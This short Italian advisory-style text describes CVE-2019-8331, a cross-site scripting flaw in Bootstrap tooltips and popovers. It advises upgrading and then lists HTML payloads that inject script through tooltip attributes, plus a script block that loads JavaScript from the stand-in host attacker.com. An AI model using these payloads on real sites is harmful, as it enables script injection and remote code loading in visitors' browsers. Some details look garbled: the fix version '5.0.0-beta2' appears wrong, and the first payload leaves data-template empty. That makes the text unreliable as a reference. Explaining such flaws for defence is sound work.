
Vulnerabilità CVE-2019-8331
CVE-2019-8331 è una vulnerabilità di sicurezza di tipo Cross-Site Scripting (XSS) presente in Bootstrap, una libreria JavaScript ampiamente utilizzata per lo sviluppo di siti web e applicazioni mobile. La vulnerabilità è dovuta al fatto che Bootstrap non filtra adeguatamente i dati forniti tramite l'attributo data-template degli elementi tooltip o popover, consentendo a un attaccante di iniettare codice dannoso nella pagina web.
Questo attacco può verificarsi se l'attaccante riesce a controllare i dati visualizzati come tooltip o popover. Quando l'utente attiva il tooltip o il popover, il codice dannoso viene iniettato nella pagina web e può essere eseguito dal browser dell'utente.
Questa vulnerabilità è stata corretta nelle versioni 4.3.1 e 5.0.0-beta2 di Bootstrap. Gli amministratori dovrebbero aggiornare le versioni interessate di Bootstrap per risolvere la vulnerabilità.
Ulteriori dettagli sulla vulnerabilità CVE-2019-8331:
<x data-toggle="tooltip" data-template="">XSS</x>
<x data-toggle="tooltip" data-html="true" title='<script>alert(1)</script>'>XSS</x>
<x data-toggle="tooltip" data-html="true" data-content='<script>alert(1)</script>'>XSS</x>
<script>
var script = document.createElement("script");
script.src = "https://attacker.com/malicious.js";
document.body.appendChild(script);
</script>